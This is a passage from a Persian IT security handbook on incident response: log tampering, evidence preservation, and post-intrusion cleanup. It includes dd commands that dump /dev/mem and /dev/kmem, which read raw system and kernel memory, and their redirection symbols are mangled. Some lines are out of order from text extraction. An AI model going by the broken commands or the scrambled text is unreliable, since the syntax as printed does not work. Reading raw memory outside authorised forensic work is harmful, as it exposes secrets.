‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﻣﺎﻫﺮ ﺑﺎﺷﺪ ﻭ ﺩﺳﺘﺮﺳﻲ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺑﻪ ﻣﺎﺷﻴﻦ ﺷﻤﺎ ﭘﻴﺪﺍ ﻛﻨﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﭘﺎﻙ ﻣﻲﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻪ ﺻﺮﻑ ﺍﻳﻨﻜﻪ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻫﻴﭻ ﻧﺸﺎﻧﻲ ﺍﺯ ﻧﻔﻮﺫ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﻧﺘﻴﺠﻪ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣـﻮﺭﺩ‬
‫ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪ ﺍﺳﺖ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻬﺎﺟﻤﺎﻥ ﺩﺭ ﻛﺎﺭ ﺧﻮﺩ ﻇﺮﺍﻓﺖ ﻧﺪﺍﺭﻧﺪ ﻭ ﺑﻪ ﺟﺎﻱ ﺍﻳﻨﻜﻪ ﺗﻨﻬﺎ ﺳﻮﺍﺑﻖ ﺣﻤﻠﺔ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﻓﺎﻳﻞ ﺛﺒﺖ ﺣﺬﻑ ﻛﻨﻨﺪ‪ ،‬ﻛﻞ ﻓﺎﻳـﻞ ﺛﺒـﺖ ﺭﺍ‬
‫ﺣﺬﻑ ﻳﺎ ﺗﺨﺮﻳﺐ ﻣﻲﻧﻤﺎﻳﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺪﺍﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺍﮔﺮ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﺪ ﻛﻪ ﻓﺎﻳﻞ ﺛﺒﺖ ﺣﺬﻑ ﻳﺎ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﺧـﺮﺍﺏ ﺷـﺪﻩ ﺍﺳـﺖ‪ ،‬ﺍﻳـﻦ‬
‫ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺍﻣﺎ ﺍﻳﻦ ﺗﻨﻬﺎ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‪ .‬ﻓﻘﺪﺍﻥ ﻳﺎ ﺧﺮﺍﺑﻲ ﺛﺒﺘﻬـﺎ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺩﻟﻴﻞ ﺑﻲﺩﻗﺘﻲ ﻳﻜﻲ ﺍﺯ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺍﺗﻔﺎﻕ ﺑﻴﺎﻓﺘﺪ‪ ،‬ﻳﺎ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﮏ ﺑﺮﻧﺎﻣـﺔ ﻣـﺸﺮﻭﻉ ﺑـﺮﺍﻱ ﺣـﺬﻑ ﺛﺒﺘﻬـﺎ ﺩﺭ‬
‫ﻓﻮﺍﺻﻞ ﻣﻌﻴﻦ ‪ -‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﺷﻐﺎﻝ ﻓﻀﺎﻱ ﺯﻳﺎﺩﻱ ﺍﺯ ﺩﻳﺴﻚ ‪ -‬ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺑﺮﻭﺯ ﺗﻐﻴﻴﺮﺍﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﻛﺎﺭﺑﺮ ﺧﺎﺹ‪ ،‬ﺑﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺳﻴـﺴﺘﻢ‬
‫ﺧﻮﺩ ﭘﻲ ﺑﺒﺮﻳﺪ‪ .‬ﺍﻳﻦ ﻳﻚ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨﺪﺓ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺑﺮﺭﺳﻲ ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﻓﺎﻳﻠﻬﺎ ﺑﻤﻨﻈﻮﺭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺁﻧﻬﺎ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺑﺼﻮﺭﺕ ﭼﺎﭘﻲ ﻧﻴﺰ ﺛﺒﺘﻬﺎﻳﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻭﻝ ﻧﮕﺎﻫﻲ ﺑﻪ ﺁﻧﻬﺎ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪ ،‬ﭼﻮﻥ ﻣﻄﻤﺌﻦ ﻫﺴﺘﻴﺪ ﻣﻬﺎﺟﻤـﺎﻧﻲ ﻛـﻪ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﻳﺎ ﺗﻠﻔﻦ ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ‪) .‬ﺍﻟﺒﺘﻪ ﺑﻪ ﺷﺮﻃﻲ ﻛﻪ ﭼﺎﭖ ﺛﺒﺘﻬﺎ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪(.‬‬

‫ﺣﻔﻆ ﻣﺪﺍﺭﻙ‬
‫ﻝ ﺑﺮ ﻭﻗﻮﻉ ﺟـﺮﻡ ﺩﺍﺭﻳـﺪ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ‬
‫ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ )ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ(‪ ،‬ﻧﻴﺎﺯ ﺑﻪ ﻣﺪﺍﺭﻛﻲ ﺩﺍ ﹼ‬
‫ﻗﺼﺪ ﺍﻧﺠﺎﻡ ﻫﻴﭽﮕﻮﻧﻪ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻧﺪﺍﺭﻳﺪ‪ ،‬ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺑﺎﺯﺳﺎﺯﻱ ﺁﻧﭽﻪ ﮐﻪ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﮐﻤﮏ ﻛﻨﺪ‪.‬‬
‫ﻼ ﭼﻨﺪ ﺭﻭﺵ ﻛﻪ ﺑﻪ ﻧﻈﺮ ﻣﻔﻴﺪ ﻣﻲﺁﻳﻨﺪ ﺭﺍ ﻣﻲﺧﻮﺍﻧﻴﺪ‪.‬‬
‫ﺭﻭﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺫﻳ ﹰ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺣﺎﻓﻈﺔ ﺳﻴﺴﺘﻢ ﺭﺍ ﺟﻤﻊﺁﻭﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ‪ Unix‬ﺍﻳﻨﻜﺎﺭ ﺑﺎ ﺩﺳﺘﻮﺭ ‪ dd‬ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪:‬‬ ‫‪.١‬‬

‫‪# dd bs=1024 « /dev/mem » mem.image‬‬


‫‪# dd bs=1024 « /dev/kmem » kmem.image‬‬
‫ﻳﻚ ﻧﺴﺨﺔ ﻛﺎﻣﻞ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﺳﺨﺖ ﺧﻮﺩ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺣﺎﻻ ﺩﻳﺴﻜﻬﺎﻱ ﺍﺻﻠﻲ ﺭﺍ ﺑﺮﺩﺍﺭﻳﺪ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺟﺎﻱ ﺍﻣﻨﻲ ﻗـﺮﺍﺭ ﺩﻫﻴـﺪ‪ ،‬ﻭ ﺭﻭﻱ‬ ‫‪.٢‬‬
‫ﻳﻚ ﻣﺎﺷﻴﻦ ﺩﻳﮕﺮ ﺑﺎ ﻧﺴﺨﻪﻫﺎﻱ ﺛﺎﻧﻮﻳﻪ ﻛﺎﺭ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ‪ /proc‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻧـﺴﺨﺔ ﺩﻭﻡ ﺁﻥ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﺑﻪ ﮐﺎﺭ ﺑﻴﺎﻳﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻛﻠﻴﺪﻱ ﻛﻪ ﺍﺯ ﻣﻬﺎﺟﻢ ﺑﻪ ﺟﺎ ﻣﺎﻧﺪﻩ ﻳﺎ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻛﻨﻴـﺪ ﻭ ﺍﺯ ﺍﻳـﻦ ﺑﺎﻳﮕـﺎﻧﻲ ﺩﺭ ﭼﻨـﺪﻳﻦ‬ ‫‪.٣‬‬
‫ﺭﺍﻳﺎﻧﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻪ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻳﺎ ﺩﻳﺴﻚ ﻧﻮﺭﻱ ﺑﻨﻮﻳﺴﻴﺪ‪.‬‬ ‫‪.٤‬‬
‫ﺩﺳﺘﻮﺭ "‪ "arp –a‬ﻳﺎ "‪ "arp –v‬ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﺗﺎ ﻣﺤﺘﻮﻳﺎﺕ ﺟﺪﻭﻝ ‪ - ARP‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻴﺎﻧﮕﺮ ﺍﺗﺼﺎﻻﺕ ﺍﺧﻴﺮ ﺷﺒﻜﻪﺍﻱ ﺑﺎﺷـﺪ ‪ -‬ﺭﺍ‬ ‫‪.٥‬‬
‫ﭘﻴﺶ ﺭﻭﻱ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻇﺎﻫﺮ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺷﻤﺎ ﺗﺨﺮﻳـﺐ ﺷـﺪﻩ‪ ،‬ﺁﻥ ﺻـﻔﺤﺎﺕ ‪ HTML‬ﺭﺍ ﺭﻭﻱ ﺩﻳـﺴﻚ ﺳـﺨﺖ ﺧـﻮﺩ ﺫﺧﻴـﺮﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﺯ ﻳـﻚ ﺍﺑـﺰﺍﺭ‬ ‫‪.٦‬‬
‫ﺗﺼﻮﻳﺮﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺻﻔﺤﺔ ﻧﻤﺎﻳﺶ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﻧﺤﻮﺓ ﻧﻤﺎﻳﺶ ﺁﻥ ﺻﻔﺤﺎﺕ ﺭﻭﻱ ﻧﻤﺎﻳﺸﮕﺮ ﺭﺍ ﺫﺧﻴﺮﻩ ﺳﺎﺯﻳﺪ‪.‬‬
‫ﺍﺯ ﺗﺼﺎﻭﻳﺮﻱ ﻛﻪ ﺣﺎﻟﺖ ﺟﺎﺭﻱ ﺳﻴﺴﺘﻢ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺎﺯﮔﻮ ﻣﻲﻛﻨﻨﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺑﺮﻧﺎﻣﺔ ‪ X Window‬ﺍﺯ ‪ xwd‬ﻭ ﺩﺭ‬ ‫‪.٧‬‬
‫‪ Microsoft Windows‬ﺍﺯ ﻛﻠﻴﺪ ‪ Print Screen‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٣٦‬‬

‫ﺧﻼﺻﻪﭘﻴﺎﻡ ‪ MD5‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮ ﺗﺼﻮﻳﺮ ﻳﺎ ﻓﺎﻳﻠﻲ ﻛﻪ ﺑﺎﺯﻳﺎﺑﻲ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﻳـﺪ‪ .‬ﺍﻳـﻦ ‪ MD5‬ﺭﺍ ﺭﻭﻱ ﻛﺎﻏـﺬ ﭼـﺎﭖ ﻛﻨﻴـﺪ‪،‬‬ ‫‪.٨‬‬
‫ﺍﻣﻀﺎ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺗﺎﺭﻳﺦ ﺑﺰﻧﻴﺪ‪ ،‬ﻭ ﺁﻧﺮﺍ ﺩﺭ ﻛﺘﺎﺑﭽﺔ ﺛﺒﺖ ﻭﻗﺎﻳﻊ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺑﻌﺪﻫﺎ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺍﻳـﻦ ‪ MD5‬ﺑـﺮﺍﻱ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺗﻐﻴﻴـﺮ‬
‫ﻧﻴﺎﻓﺘﻦ ﻣﺪﺍﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻳﻜﺴﺮﻱ ﻣﺤﺼﻮﻻﺕ ﺗﺠﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ‪ ،‬ﻣﺎﻧﻨﺪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻧـﺴﺨﻪﺑـﺮﺩﺍﺭﻱ ﺳـﺮﻋﺖ ﺑـﺎﻻ ﺍﺯ‬
‫ﺩﻳﺴﻚ‪ ،٣٤٢‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻞ ﻗﺎﻧﻮﻧﻲ ﺷﺒﻜﻪﺍﻱ )‪ ٣٤٣(NFATs‬ﻛﻪ ﺗﻤﺎﻡ ﺑﺴﺘﻪﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻭ ﺧﺮﻭﺟﻲ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﺴﺆﻭﻻﻥ ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ ﺭﺍ ﻭﺍﺭﺩ ﻣﺎﺟﺮﺍ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺳﺮﺧﻮﺩ ﺷﺮﻭﻉ ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻛﻨﻴﺪ‪ ،‬ﺑﺎ ﺁﻧﻬﺎ ﻣﺸﻮﺭﺕ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫ﺗﻤﻴﺰﻛﺎﺭﻱ ﺑﻌﺪ ﺍﺯ ﺗﻬﺎﺟﻢ‬


‫ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺑﻪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺍﺑﺮﻛﺎﺭﺑﺮ ﻳﺎ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻳﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺩﻳﮕﺮﻱ ﺑﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺳﻄﺢ ﺑﺎﻻ ﺭﺳـﻴﺪﻩ ﺑﺎﺷـﺪ‪ ،‬ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻃﻮﺭﻱ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻳﻨﺪﻩ ﺭﺍﺣﺖﺗﺮ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺷـﻮﺩ‪ .‬ﺍﮔـﺮ ﻣﻬـﺎﺟﻢ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﮔـﺮﺩﺁﻭﺭﻱﻛﻨﻨـﺪﺓ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ﻳﺎ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺯﺩﻳﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺗﺎ ﻭﻗﺘﻲ ﻛﻪ ﺗﻤﺎﻡ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ‬
‫ﺭﺍ ﻋﻮﺽ ﻧﻜﻨﻴﺪ‪ ،‬ﻋﻠﻴﺮﻏﻢ ﻫﺮ ﻋﻤﻞ ﭘﻴﺸﮕﻴﺮﺍﻧﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺑﺎﺯ ﻫﻢ ﻧﺴﺒﺖ ﺑﻪ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻬـﺎﺟﻢ ﺍﺯ ﻳـﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻣﺠﺎﺯ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻛﻪ ﺑﺎﻳﺪ ﺗﻤﺎﻡ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﺷﻚ ﻧﻜﻨﻴﺪ!‬
‫ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺑﺎﻳﺪ ﻳﻚ ﻣﻤﻴﺰﻱ ﺩﻗﻴﻖ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﺗﺎ ﻭﺳﻌﺖ ﺧﺴﺎﺭﺗﻬﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺴﺘﻪ ﺑﻪ ﻧﻮﻉ ﻧﻔﻮﺫ‪ ،‬ﻣﺠﺒﻮﺭ ﻫﺴﺘﻴﺪ‬
‫ﺗﻤﺎﻡ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺳﻲ ﻛﻨﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻭﻱ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺧﻮﺩ ﻭ ﻳﺎ ﺣﺘﻲ ﺗﻤـﺎﻡ ﺷـﺒﻜﻪ )ﺍﺯ ﺟﻤﻠـﻪ‬
‫ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻭ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺷﺒﻜﻪﺍﻱ( ﺭﺍ ﻧﻴﺰ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﻃﺮﻕ ﻣﺨﺘﻠﻔﻲ ﺩﺳﺘﻜﺎﺭﻱ ﻛﻨﺪ ﻛﻪ ﻛﺸﻒ ﺁﻧﻬﺎ ﺩﺷﻮﺍﺭ ﻳﺎ ﻏﻴﺮﻣﻤﻜﻦ ﺑﺎﺷﺪ‪ .‬ﻣﻄﻤﺌﻨﺘﺮﻳﻦ ﺭﺍﻩ ﺍﻳﻦ ﺍﺳﺖ‬
‫ﻛﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺍﺑﺘﺪﺍ ﻧﺼﺐ ﻭ ﺗﻤﺎﻡ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻧﺮﺍ ﺍﻋﻤﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﻫﻤﺮﺍﻩ ﻭﺻـﻠﻪﻫﺎﻳـﺸﺎﻥ‬
‫ﻣﺠﺪﺩﹰﺍ ﻧﺼﺐ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﻪ ﺩﻗﺖ ﻓﺎﻳﻠﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﻳﺎ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﻜﻬﺎﻱ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺑﺎﺯﻳـﺎﺑﻲ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺩﺭ ﻣﻤﻴﺰﻱ ﺧﻮﺩ ﺑﺎﻳﺪ ﺑﺪﻧﺒﺎﻝ ﺍﺗﻔﺎﻗﺎﺕ ﻏﻴﺮﻣﻌﻤﻮﻝ ﻛﻪ ﻫﻨﮕﺎﻡ ﻧﻔﻮﺫ ﺭﺍﻳﺞ ﻣﻲﺷﻮﻧﺪ ﺑﺎﺷﻴﺪ؛ ﻣﺜﻞ‪:‬‬

‫ﺣﺴﺎﺑﻬﺎﻱ ﺟﺪﻳﺪ‬
‫ﺑﻌﺪ ﺍﺯ ﻳﻚ ﻧﻔﻮﺫ‪ ،‬ﺑﺪﻧﺒﺎﻝ ﺣﺴﺎﺑﻬﺎﻱ ﺟﺪﻳﺪ ﺑﮕﺮﺩﻳﺪ ﻭ ﻫﺮ ﺣﺴﺎﺑﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ ﺭﺍ ﭘﺎﻙ ﻛﻨﻴﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑﺨﻮﺍﻫﻴـﺪ‬
‫ﻗﺒﻞ ﺍﺯ ﭘﺎﻙ ﻛﺮﺩﻥ‪ ،‬ﺳﺎﺑﻘﻪﺍﻱ ﻛﺎﻏﺬﻱ ﺍﺯ ﺍﻳﻦ ﺣﺴﺎﺑﻬﺎ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﻣﻬﺎﺟﻢ ﺭﺍ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪) .‬ﺍﻟﺒﺘـﻪ ﺍﮔـﺮ ﺑﺘﻮﺍﻧﻴـﺪ ﺍﻭ ﺭﺍ ﭘﻴـﺪﺍ‬
‫ﻛﻨﻴﺪ‪(.‬‬

‫ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﻣﺤﺘﻮﻳﺎﺕ ﻳﺎ ﻣﺠﻮﺯﻫﺎﻱ ﻓﺎﻳﻠﻬﺎ‬


‫ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻻﻳﻲ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻫﺮ ﻓﺎﻳﻠﻲ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺑﺎﻳﺪ ﺗﻤﺎﻡ ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ ﺧـﻮﺩ‬
‫ﺭﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ ،‬ﻭﻟﻲ ﺑﻴﺸﺘﺮ ﺑﺪﻧﺒﺎﻝ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺑﺎﺷﻴﺪ ﻛﻪ ﺭﻭﻱ ﺍﻣﻨﻴﺖ ﺗﺄﺛﻴﺮﮔـﺬﺍﺭ ﻫـﺴﺘﻨﺪ‪ .‬ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻬـﺎﺟﻢ‬
